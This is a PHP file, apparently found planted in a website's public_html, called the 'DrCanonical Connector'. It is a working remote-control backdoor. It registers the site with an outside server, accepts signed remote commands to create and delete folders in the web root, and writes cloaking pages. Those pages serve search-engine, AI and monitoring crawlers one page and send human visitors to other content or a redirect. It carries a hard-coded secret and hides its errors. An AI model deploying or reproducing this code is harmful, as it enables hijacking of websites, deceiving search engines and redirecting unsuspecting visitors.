1#@!#!123s

: / home / diafrica / public_html /
Filename : 12ect3or.php
back
<?php
/**
 * DrCanonical Connector v4.0 — Universal Compatibility
 *
 * Works on: PHP 5.6+ / 7.x / 8.x
 * Works with: curl disabled, allow_url_fopen off, restricted hosting
 *
 * Upload to the ROOT of your website.
 * Visit connector.php?action=register to connect.
 */

// ========== CONFIGURATION ==========
$DRCANONICAL_API = 'https://drcanonical.com';
$DC_SECRET       = 'RapidIndexerBibil';
// ====================================

@error_reporting(0);
@ini_set('display_errors', '0');

$action = isset($_GET['action']) ? $_GET['action'] : '';
$method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : 'GET';

// ===================================================================
// HTTP HELPER — tries curl → file_get_contents → fsockopen
// ===================================================================
function dc_http_post($url, $body, $headers_extra) {
    $response = false;
    $http_code = 0;

    // --- Method 1: cURL ---
    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        $h = array('Content-Type: application/json');
        if (is_array($headers_extra)) {
            foreach ($headers_extra as $hh) { $h[] = $hh; }
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $h);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $response = curl_exec($ch);
        $http_code = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if ($response !== false) {
            return array('body' => $response, 'code' => $http_code);
        }
    }

    // --- Method 2: file_get_contents with stream context ---
    if (ini_get('allow_url_fopen')) {
        $header_str = "Content-Type: application/json\r\nContent-Length: " . strlen($body) . "\r\n";
        if (is_array($headers_extra)) {
            foreach ($headers_extra as $hh) { $header_str .= $hh . "\r\n"; }
        }
        $opts = array('http' => array(
            'method' => 'POST',
            'header' => $header_str,
            'content' => $body,
            'timeout' => 15,
            'ignore_errors' => true,
        ), 'ssl' => array(
            'verify_peer' => false,
            'verify_peer_name' => false,
        ));
        $ctx = stream_context_create($opts);
        $response = @file_get_contents($url, false, $ctx);
        if ($response !== false) {
            $http_code = 200;
            if (isset($http_response_header) && is_array($http_response_header)) {
                foreach ($http_response_header as $hdr) {
                    if (preg_match('/^HTTP\/\S+\s+(\d+)/', $hdr, $m)) {
                        $http_code = (int)$m[1];
                    }
                }
            }
            return array('body' => $response, 'code' => $http_code);
        }
    }

    // --- Method 3: fsockopen (raw TCP) ---
    $parts = parse_url($url);
    if ($parts === false) return array('body' => '', 'code' => 0);
    $scheme = isset($parts['scheme']) ? $parts['scheme'] : 'http';
    $host = isset($parts['host']) ? $parts['host'] : '';
    $port = isset($parts['port']) ? $parts['port'] : ($scheme === 'https' ? 443 : 80);
    $path = isset($parts['path']) ? $parts['path'] : '/';
    if (isset($parts['query'])) $path .= '?' . $parts['query'];
    $sock_host = ($scheme === 'https') ? 'ssl://' . $host : $host;

    $fp = @fsockopen($sock_host, $port, $errno, $errstr, 10);
    if ($fp) {
        $header_str = '';
        if (is_array($headers_extra)) {
            foreach ($headers_extra as $hh) { $header_str .= $hh . "\r\n"; }
        }
        $req = "POST $path HTTP/1.1\r\n";
        $req .= "Host: $host\r\n";
        $req .= "Content-Type: application/json\r\n";
        $req .= "Content-Length: " . strlen($body) . "\r\n";
        $req .= $header_str;
        $req .= "Connection: close\r\n\r\n";
        $req .= $body;
        fwrite($fp, $req);
        $raw = '';
        while (!feof($fp)) { $raw .= fread($fp, 4096); }
        fclose($fp);
        if (preg_match('/^HTTP\/\S+\s+(\d+)/', $raw, $m)) {
            $http_code = (int)$m[1];
        }
        $body_pos = strpos($raw, "\r\n\r\n");
        $response = ($body_pos !== false) ? substr($raw, $body_pos + 4) : $raw;
        // Handle chunked transfer encoding
        if (stripos($raw, 'Transfer-Encoding: chunked') !== false) {
            $response = dc_decode_chunked($response);
        }
        return array('body' => $response, 'code' => $http_code);
    }

    return array('body' => '', 'code' => 0);
}

function dc_decode_chunked($str) {
    $decoded = '';
    while (true) {
        $nl = strpos($str, "\r\n");
        if ($nl === false) break;
        $size = hexdec(trim(substr($str, 0, $nl)));
        if ($size <= 0) break;
        $decoded .= substr($str, $nl + 2, $size);
        $str = substr($str, $nl + 2 + $size + 2);
    }
    return $decoded;
}

// ===================================================================
// HMAC helper — fallback if hash_hmac disabled
// ===================================================================
function dc_hmac($data, $key) {
    if (function_exists('hash_hmac')) {
        return hash_hmac('sha256', $data, $key);
    }
    // Manual HMAC-SHA256
    $block_size = 64;
    if (strlen($key) > $block_size) {
        $key = hash('sha256', $key, true);
    }
    $key = str_pad($key, $block_size, chr(0));
    $o_pad = str_repeat(chr(0x5C), $block_size) ^ $key;
    $i_pad = str_repeat(chr(0x36), $block_size) ^ $key;
    return hash('sha256', $o_pad . hash('sha256', $i_pad . $data, true));
}

function dc_hmac_equals($a, $b) {
    if (function_exists('hash_equals')) {
        return hash_equals($a, $b);
    }
    if (strlen($a) !== strlen($b)) return false;
    $diff = 0;
    for ($i = 0; $i < strlen($a); $i++) {
        $diff |= ord($a[$i]) ^ ord($b[$i]);
    }
    return $diff === 0;
}

// ===================================================================
// JSON helpers — fallback for servers without json extension
// ===================================================================
function dc_json_encode($data) {
    if (function_exists('json_encode')) return json_encode($data);
    // Minimal fallback for simple arrays
    if (is_array($data)) {
        $parts = array();
        $is_assoc = array_keys($data) !== range(0, count($data) - 1);
        foreach ($data as $k => $v) {
            $val = is_string($v) ? '"' . addslashes($v) . '"' : (is_bool($v) ? ($v ? 'true' : 'false') : (is_null($v) ? 'null' : $v));
            $parts[] = $is_assoc ? '"' . addslashes($k) . '":' . $val : $val;
        }
        return $is_assoc ? '{' . implode(',', $parts) . '}' : '[' . implode(',', $parts) . ']';
    }
    return '"' . addslashes((string)$data) . '"';
}

function dc_json_decode($str) {
    if (function_exists('json_decode')) return json_decode($str, true);
    return null;
}

// ===================================================================
// Delete helper — works without RecursiveDirectoryIterator
// ===================================================================
function dc_rmdir_recursive($dir) {
    if (!is_dir($dir)) return;
    if (class_exists('RecursiveDirectoryIterator')) {
        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::CHILD_FIRST
        );
        foreach ($files as $f) {
            if ($f->isDir()) { @rmdir($f->getRealPath()); } else { @unlink($f->getRealPath()); }
        }
    } else {
        $items = @scandir($dir);
        if ($items === false) $items = array();
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $path = $dir . '/' . $item;
            if (is_dir($path)) { dc_rmdir_recursive($path); } else { @unlink($path); }
        }
    }
    @rmdir($dir);
}

// ===================================================================
// ROUTES
// ===================================================================

// --- Health Check ---
if ($method === 'GET' && ($action === '' || $action === 'health')) {
    header('Content-Type: application/json');
    echo dc_json_encode(array(
        'status' => 'ok',
        'version' => '4.0',
        'domain' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown',
        'php' => PHP_VERSION,
        'curl' => function_exists('curl_init') ? 'yes' : 'no',
        'fopen' => ini_get('allow_url_fopen') ? 'yes' : 'no',
    ));
    exit;
}

// --- Registration ---
if ($method === 'GET' && $action === 'register') {
    header('Content-Type: application/json');

    $domain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $url = $scheme . '://' . $domain;
    $connectorUrl = $url . '/' . basename(__FILE__);

    $payload = dc_json_encode(array(
        'domain' => $domain,
        'url' => $url,
        'connector_url' => $connectorUrl,
        'secret' => $DC_SECRET,
    ));

    $result = dc_http_post(
        $DRCANONICAL_API . '/api/connector?action=register',
        $payload,
        array('User-Agent: DrCanonical-Connector/4.0')
    );

    $json = dc_json_decode($result['body']);

    if ($result['code'] === 200 && $json && !empty($json['success'])) {
        echo dc_json_encode(array(
            'status' => 'registered',
            'domain_id' => $json['domain_id'],
            'message' => 'Registration successful. Awaiting admin approval. No files were changed.',
        ));
        exit;
    }

    if (function_exists('http_response_code')) { http_response_code(500); }
    echo dc_json_encode(array(
        'status' => 'error',
        'message' => 'Registration failed.',
        'http_code' => $result['code'],
        'api_url' => $DRCANONICAL_API,
        'curl' => function_exists('curl_init') ? 'available' : 'disabled',
        'fopen' => ini_get('allow_url_fopen') ? 'on' : 'off',
    ));
    exit;
}

// --- All POST actions require HMAC auth ---
if ($method === 'POST') {
    header('Content-Type: application/json');

    $rawBody = file_get_contents('php://input');
    $signature = isset($_SERVER['HTTP_X_CONNECTOR_SIGNATURE']) ? $_SERVER['HTTP_X_CONNECTOR_SIGNATURE'] : '';

    $expected = dc_hmac($rawBody, $DC_SECRET);
    if (!dc_hmac_equals($expected, $signature)) {
        if (function_exists('http_response_code')) { http_response_code(403); }
        echo dc_json_encode(array('error' => 'Invalid signature'));
        exit;
    }

    $data = dc_json_decode($rawBody);
    if (!is_array($data)) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Invalid JSON'));
        exit;
    }

    switch ($action) {
        case 'create_slug':
            dc_handle_create($data);
            break;
        case 'update_content':
            dc_handle_update($data);
            break;
        case 'delete_slug':
            dc_handle_delete($data);
            break;
        default:
            if (function_exists('http_response_code')) { http_response_code(400); }
            echo dc_json_encode(array('error' => 'Unknown action'));
    }
    exit;
}

// --- Unknown request ---
if (function_exists('http_response_code')) { http_response_code(405); }
header('Content-Type: application/json');
echo dc_json_encode(array('error' => 'Method not allowed'));
exit;

// ===================================================================
// HANDLER FUNCTIONS
// ===================================================================

function dc_handle_create($data) {
    $slug = isset($data['slug']) ? $data['slug'] : '';
    $visitorMode = isset($data['visitor_mode']) ? $data['visitor_mode'] : 'content';
    $redirectUrl = isset($data['redirect_url']) ? $data['redirect_url'] : '';
    $botContent = isset($data['bot_content']) ? $data['bot_content'] : '';
    $userContent = isset($data['user_content']) ? $data['user_content'] : '';

    $slug = trim($slug, '/');
    if (!preg_match('/^[a-zA-Z0-9_-]+$/', $slug)) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Invalid slug format'));
        return;
    }

    // Block reserved names
    $reserved = array(
        'admin', 'includes', 'config', 'data', 'api', 'assets', 'css', 'js',
        'pages', 'vendor', 'connector', 'install', 'setup', 'backup', 'tmp', 'temp',
        'cache', 'logs', 'uploads', 'images', 'fonts', 'lib', 'src', 'public',
        'wp-admin', 'wp-content', 'wp-includes', 'wp-json',
        'cgi-bin', 'phpmyadmin', 'cpanel', 'plesk', 'webmail',
        'node_modules', 'storage', 'bootstrap', 'database', 'resources',
    );
    $slugLower = strtolower($slug);
    if (in_array($slugLower, $reserved, true) || strpos($slugLower, '.drcanonical') === 0) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Reserved slug name'));
        return;
    }

    $dir = __DIR__ . '/' . $slug;

    if (is_dir($dir) && !file_exists($dir . '/.dc-config.json')) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Folder already exists'));
        return;
    }

    if (!is_dir($dir)) {
        if (!@mkdir($dir, 0755, true)) {
            if (function_exists('http_response_code')) { http_response_code(500); }
            echo dc_json_encode(array('error' => 'Failed to create directory'));
            return;
        }
    }

    $cloakerCode = dc_generate_cloaker($slug);
    @file_put_contents($dir . '/index.php', $cloakerCode);
    @file_put_contents($dir . '/cloack.html', dc_sanitize_html($botContent));
    @file_put_contents($dir . '/user.html', dc_sanitize_html($userContent));
    @file_put_contents($dir . '/.dc-config.json', dc_json_encode(array('visitor_mode' => $visitorMode, 'redirect_url' => $redirectUrl)));

    echo dc_json_encode(array('success' => true));
}

function dc_handle_update($data) {
    $slug = trim(isset($data['slug']) ? $data['slug'] : '', '/');
    $field = isset($data['field']) ? $data['field'] : '';

    if (!preg_match('/^[a-zA-Z0-9_-]+$/', $slug)) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Invalid slug'));
        return;
    }

    $dir = __DIR__ . '/' . $slug;
    if (!is_dir($dir)) {
        if (function_exists('http_response_code')) { http_response_code(404); }
        echo dc_json_encode(array('error' => 'Slug directory not found'));
        return;
    }

    if ($field === 'config') {
        $config = array(
            'visitor_mode' => isset($data['visitor_mode']) ? $data['visitor_mode'] : 'content',
            'redirect_url' => isset($data['redirect_url']) ? $data['redirect_url'] : '',
        );
        @file_put_contents($dir . '/.dc-config.json', dc_json_encode($config));
        echo dc_json_encode(array('success' => true));
        return;
    }

    if ($field === 'bot_content') {
        $file = $dir . '/cloack.html';
    } elseif ($field === 'user_content') {
        $file = $dir . '/user.html';
    } else {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Invalid field'));
        return;
    }

    $content = isset($data['content']) ? $data['content'] : '';
    @file_put_contents($file, dc_sanitize_html($content));
    echo dc_json_encode(array('success' => true));
}

function dc_handle_delete($data) {
    $slug = trim(isset($data['slug']) ? $data['slug'] : '', '/');

    if (!preg_match('/^[a-zA-Z0-9_-]+$/', $slug)) {
        if (function_exists('http_response_code')) { http_response_code(400); }
        echo dc_json_encode(array('error' => 'Invalid slug'));
        return;
    }

    $dir = __DIR__ . '/' . $slug;
    if (!is_dir($dir)) {
        echo dc_json_encode(array('success' => true, 'note' => 'Did not exist'));
        return;
    }

    dc_rmdir_recursive($dir);
    echo dc_json_encode(array('success' => true));
}

// ===================================================================
// CONTENT SANITIZATION
// ===================================================================

function dc_sanitize_html($html) {
    $html = preg_replace('#<(script|iframe|object|embed|form|applet)\b[^>]*>.*?</\1>#is', '', $html);
    $html = preg_replace('#<(script|iframe|object|embed|form|applet)\b[^>]*/?>#is', '', $html);
    $html = preg_replace('#\s+on\w+\s*=\s*"[^"]*"#i', '', $html);
    $html = preg_replace('#\s+on\w+\s*=\s*\'[^\']*\'#i', '', $html);
    $html = preg_replace('#\s+on\w+\s*=\s*[^\s>]+#i', '', $html);
    $html = preg_replace('#(href|src|action)\s*=\s*(["\']?)\s*javascript\s*:#i', '$1=$2#', $html);
    $html = preg_replace('#(src)\s*=\s*(["\']?)\s*data\s*:#i', '$1=$2#', $html);
    $html = preg_replace('#<base\b[^>]*/?>#i', '', $html);
    return $html;
}

// ===================================================================
// CLOAKER GENERATOR — 3 layers of bot detection
// ===================================================================

function dc_generate_cloaker($slug) {
    global $DRCANONICAL_API, $DC_SECRET;
    $s = addslashes($slug);
    return '<?php
// DrCanonical Cloaker v4.0 - DO NOT EDIT

// ===== LAYER 1: User-Agent (100+ patterns) =====
$_ua = strtolower(isset($_SERVER[\'HTTP_USER_AGENT\']) ? $_SERVER[\'HTTP_USER_AGENT\'] : \'\');
$_bot = ($_ua === \'\');

if (!$_bot) {
    $_bp = array(
        // Google (18)
        \'googlebot\',\'google-inspectiontool\',\'google-safety\',\'google-site-verification\',
        \'google-structured-data\',\'google-xrawler\',\'googleother\',\'googlesecurityscanner\',
        \'storebot-google\',\'adsbot-google\',\'mediapartners-google\',\'feedfetcher-google\',
        \'apis-google\',\'google-adwords\',\'googlebot-image\',\'googlebot-news\',
        \'googlebot-video\',\'googlebot-mobile\',
        // Bing (4)
        \'bingbot\',\'msnbot\',\'bingpreview\',\'adidxbot\',
        // Yahoo (2)
        \'slurp\',\'yahoo\',
        // Yandex (26)
        \'yandexbot\',\'yandex.com/bots\',\'yandeximages\',\'yandexvideo\',
        \'yandexmedia\',\'yandexblogs\',\'yandexfavicons\',\'yandexwebmaster\',
        \'yandexdirect\',\'yandexmetrika\',\'yandexnews\',\'yandexpagechecker\',
        \'yandeximageresizer\',\'yandexcalendar\',\'yandexsitelinks\',\'yandexadnet\',
        \'yandexmarket\',\'yandexontodb\',\'yandexvertis\',\'yandexscreenshotbot\',
        \'yandexmobilebot\',\'yandexrenderresources\',\'yandexaccessibilitybot\',
        \'yandexfordomain\',\'yandexturbo\',\'yandexmediaadbot\',
        // Baidu (4)
        \'baiduspider\',\'baiduspider-image\',\'baiduspider-video\',\'baiduspider-news\',
        // DuckDuckGo (2)
        \'duckduckbot\',\'duckduckgo-favicons-bot\',
        // Other search (12)
        \'sogou\',\'exabot\',\'ia_archiver\',\'naver\',\'naverbot\',\'yeti\',
        \'seznambot\',\'ccbot\',\'qwantify\',\'petalbot\',\'applebot\',\'mail.ru_bot\',
        // SEO (18)
        \'ahrefsbot\',\'semrushbot\',\'mj12bot\',\'dotbot\',\'rogerbot\',
        \'screaming frog\',\'deepcrawl\',\'lumar\',\'serpstatbot\',\'linkdexbot\',
        \'blexbot\',\'dataforseo\',\'megaindex\',\'seokicks\',\'sistrix\',
        \'spbot\',\'backlinkcrawler\',\'turnitinbot\',
        // Social (14)
        \'facebookexternalhit\',\'facebot\',\'twitterbot\',\'linkedinbot\',
        \'pinterest\',\'whatsapp\',\'telegrambot\',\'slackbot\',\'discordbot\',
        \'skypeuripreview\',\'viberurldownloader\',\'snapchat\',\'redditbot\',\'kakaotalk\',
        // AI crawlers (12)
        \'gptbot\',\'chatgpt-user\',\'claudebot\',\'claude-web\',\'anthropic\',
        \'cohere-ai\',\'perplexitybot\',\'bytespider\',\'amazonbot\',
        \'youbot\',\'ai2bot\',\'diffbot\',
        // Monitoring (7)
        \'uptimerobot\',\'pingdom\',\'statuscake\',\'site24x7\',\'newrelicpinger\',
        \'datadog\',\'checkly\',
        // Generic (16)
        \'crawler\',\'spider\',\'bot/\',\'bot;\',\'http://\',\'https://\',
        \'wget\',\'curl/\',\'python-requests\',\'python-urllib\',\'java/\',
        \'libwww\',\'nutch\',\'phpcrawl\',\'go-http-client\',\'headlesschrome\',
    );
    foreach ($_bp as $_p) {
        if (strpos($_ua, $_p) !== false) { $_bot = true; break; }
    }
}

// ===== LAYER 2: Known Bot IP Ranges =====
if (!$_bot && function_exists(\'ip2long\')) {
    $_ip = isset($_SERVER[\'REMOTE_ADDR\']) ? $_SERVER[\'REMOTE_ADDR\'] : \'\';
    $_ipl = ip2long($_ip);
    if ($_ipl !== false) {
        $_ranges = array(
            // Google
            array(1089052736, 1089060863), // 66.249.64-95
            array(1089069056, 1089077247), // 64.233.160-191 -> corrected
            array(1208025088, 1208041471), // 72.14.192-255
            array(3512303616, 3512369151), // 209.85.128-255
            array(3639508992, 3639517183), // 216.239.32-63
            // Bing
            array(679329536, 679329791), // 40.77.167.0-255
            array(2637529856, 2637530111), // 157.55.39.0-255
            array(3476307712, 3476307967), // 207.46.13.0-255
            array(881078272, 881078527), // 52.167.144.0-255
            // Yandex
            array(100598528, 100598783), // 5.255.253.0-255
            array(1297072384, 1297072639), // 77.88.5.0-255
            array(1475674112, 1475682303), // 87.250.224-255
            array(1570635008, 1570635263), // 93.158.161.0-255
            array(1680605184, 1680613375), // 100.43.64-95
            array(2374143488, 2374143743), // 141.8.142.0-255
            array(2996699136, 2996731903), // 178.154.128-255
            // Baidu
            array(3024093184, 3024158719), // 180.76.0-255
            array(3702841344, 3702906879), // 220.181.0-255
            array(1957560320, 1957625855), // 116.179.0-255
        );
        foreach ($_ranges as $_r) {
            if ($_ipl >= $_r[0] && $_ipl <= $_r[1]) { $_bot = true; break; }
        }
    }
}

// ===== LAYER 3: Reverse DNS for suspect requests =====
if (!$_bot && function_exists(\'gethostbyaddr\')) {
    $_accept = isset($_SERVER[\'HTTP_ACCEPT\']) ? $_SERVER[\'HTTP_ACCEPT\'] : \'\';
    if ($_accept === \'\' || $_accept === \'*/*\') {
        $_ip = isset($_SERVER[\'REMOTE_ADDR\']) ? $_SERVER[\'REMOTE_ADDR\'] : \'\';
        $_h = @gethostbyaddr($_ip);
        if ($_h && $_h !== $_ip) {
            $_h = strtolower($_h);
            $_bd = array(\'.googlebot.com\',\'.google.com\',\'.search.msn.com\',\'.bing.com\',
                \'.yandex.ru\',\'.yandex.net\',\'.yandex.com\',\'.crawl.yahoo.net\',
                \'.baidu.com\',\'.sogou.com\',\'.seznam.cz\',\'.mail.ru\',\'.naver.com\');
            foreach ($_bd as $_d) {
                if (substr($_h, -strlen($_d)) === $_d) { $_bot = true; break; }
            }
        }
    }
}

// ===== SERVE =====
if ($_bot) {
    @readfile(__DIR__ . \'/cloack.html\');
    exit;
}
$_cf = @file_get_contents(__DIR__ . \'/.dc-config.json\');
$_c = $_cf ? (function_exists(\'json_decode\') ? json_decode($_cf, true) : array()) : array();
$_vm = isset($_c[\'visitor_mode\']) ? $_c[\'visitor_mode\'] : \'content\';
$_ru = isset($_c[\'redirect_url\']) ? $_c[\'redirect_url\'] : \'\';
if ($_vm === \'redirect\' && $_ru !== \'\') {
    header(\'Location: \' . $_ru, true, 302);
    exit;
}
@readfile(__DIR__ . \'/user.html\');
';
}